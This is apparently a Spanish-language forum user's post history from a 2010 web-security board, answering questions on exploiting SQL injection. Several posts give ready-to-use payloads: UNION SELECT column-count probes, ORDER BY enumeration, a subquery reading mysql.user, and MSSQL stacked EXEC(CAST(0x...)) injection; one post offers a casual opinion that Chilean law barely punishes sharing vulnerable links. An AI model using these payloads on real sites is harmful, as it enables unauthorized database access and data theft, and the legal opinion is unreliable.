|
11
|
Seguridad Informática / Nivel Web / Re: Eres un hacker chileno?
|
en: 8 Septiembre 2010, 00:10 am
|
El otro dia con varios amigos, definiamos si el publicar Link (SQL Injection, XSS, etc )es Tomado como una "violacion" a las leyes. Artículo 4°.- El que maliciosamente[b] revele o difunda los datos contenidos en un sistema de información[/b], sufrirá la pena de presidio menor en su grado medio. Si quien incurre en estas conductas es el responsable del sistema de información, la pena se aumentará en un grado. "Datos Contenidos" : El Link No es un "dato contenido" es un Dato Externo que hace relacion a algo interno y depende de la persona como utilize dicho link. Si cambiaran el "Datos Contenido" por "Datos Relaciones a un sistema ..." Seria todo tan distinto. Pero de igual manera en chile NO te joden por estas leyes, te toman por el lado de daño de imagen y tiempo que dejaste OFF el site que es en realidad un "daño" a la operabilidad de la empresa. Por lo tanto, si tenemos pobres estas leyes, pero es una imagen nada mas para tendar a chavalines a dejar la cagada. total se los CAGAN con otras leyes. Saludos¡ Oz.
|
|
|
12
|
Seguridad Informática / Nivel Web / Re: respuesta contradicotria en sql injection
|
en: 8 Septiembre 2010, 00:04 am
|
Lo que YO ejecutaría seria.
4+and+1=0+union+select+all+1+--+ 4+and+1=0+union+select+all+1,2+--+ 4+and+1=0+union+select+all+1,2,3+--+ 4+and+1=0+union+select+all+1,2,3,4+--+ 4+and+1=0+union+select+all+1,2,3,4,5+--+ 4+and+1=0+union+select+all+1,2,3,4,5,6+--+ 4+and+1=0+union+select+all+1,2,3,4,5,6,7+--+ 4+and+1=0+union+select+all+1,2,3,4,5,6,7,8+--+ 4+and+1=0+union+select+all+1,2,3,4,5,6,7,8,9+--+ 4+and+1=0+union+select+all+1,2,3,4,5,6,7,8,9,10...N+--+
Muchas veces 1 variable via GET es tomada por 2 funciones distintas en la misma web. Me explico. Aveces la pagina hace 2 consultas en donde la segunda depende de la primera. es por ello que aveces te tira ese error, siendo que realmente no es la cantidad de campos original en la consulta si no mas bien es de la segunda consulta.
Cambia el /* por el +--+, por cada intento aveces por ese maldito detalle es que no deja generar bien la consulta.
En el Caso que no te muestre nada, explotalo bien blind.
SAludos.
|
|
|
14
|
Seguridad Informática / Nivel Web / Re: Problema al hacer una SQLi
|
en: 3 Septiembre 2010, 03:03 am
|
-1')+and+1=1+order+by+87+--+ si te tira ese erro q mencinoas ahi tenes tu sqli estable nada mas anda provando -1')+and+1=1+order+by+15+--+ -1')+and+1=1+order+by+10+--+ hasta que no te tire error luego cambia el 1=1 por 1=0 y tendras tu SQLI estable.
Saludos.
|
|
|
16
|
Seguridad Informática / Nivel Web / Re: Ayuda con esta inyeccion SQL
|
en: 14 Agosto 2010, 01:13 am
|
osea en realidad, si se puede generar una segunda consulta apartir de otra, pasa en las union sql injection
select * from noticias where id = 12 and+(select+user+from+mysql.user)=1 Si se fijan realmente se puede ejecutar 2 consultas. el detalle esta en que tipo de funcion se pueda ejecutar, update,insert,etc, no puede ir predecedido de un select. es ahi el asunto. pero de que se puede generar 2 consultas como pregunta global, es un rotundi SI.
|
|
|
17
|
Seguridad Informática / Nivel Web / Re: Ayudante da tablas by Inteligencia
|
en: 14 Agosto 2010, 01:05 am
|
Easy ShellRoot. @Intenligencia¡ Podrias colocar un ejemplo, porque a primera vista, no se entiende nada. Se utiliza con varias querys? var=65&v=43 ... etc? Detecta con Magic quotes? Que pasa si Es una Version 4? Como detecta que realmente se trata de Mysql?
Saludos bro¡
|
|
|
19
|
Seguridad Informática / Nivel Web / Re: Duda SQLinjection en information_schema
|
en: 11 Julio 2010, 21:49 pm
|
Me alegro que lo solucionate, pero para evitar esos dramas, podria ocuarplo de forma inversa.
+and+1=1+union+select+all+1 +and+1=1+union+select+all+1,2 +and+1=1+union+select+all+1,2,3 +and+1=1+union+select+all+1,2,3,4...n
si te fijas , cuando encuentres el Match, sera una condicion verdadera, por lo tanto vas a visualizr el sitio en su formato original.
Saludos¡
|
|
|
20
|
Seguridad Informática / Nivel Web / Re: CAST EXEC en sql injection(Automated Sql Injection)
|
en: 11 Julio 2010, 21:43 pm
|
Eso es MSSQL: (por lo que veo a simple vista) En donde PRimero Tienes que declarar la variable. Luego le asignas el valor de @s. para Luego ejecutarlo. Esa es la gran gracia de las Stacked Querys ";". Pero podrias ejecutarlo directamente desde ;EXEC(CAST(0X...)) El 0X, es exadecial, pero no es necesario ocuparlo si estas bajo asp, php sin magicquotes. porque comunmente se ocupa para ahorrarse las comillas. http://palisade.plynt.com/issues/2006Jun/injection-stored-procedures/Eso es Solamente SQL. (T-SQL) En lo Personal, lo que mas me a costado de estas inyecciones, de exec, es poder hacerlas estables, porque dependeras casi en su totalidad de la consulta original. SAludos EvilGlobin.
|
|
|
|
|
|
|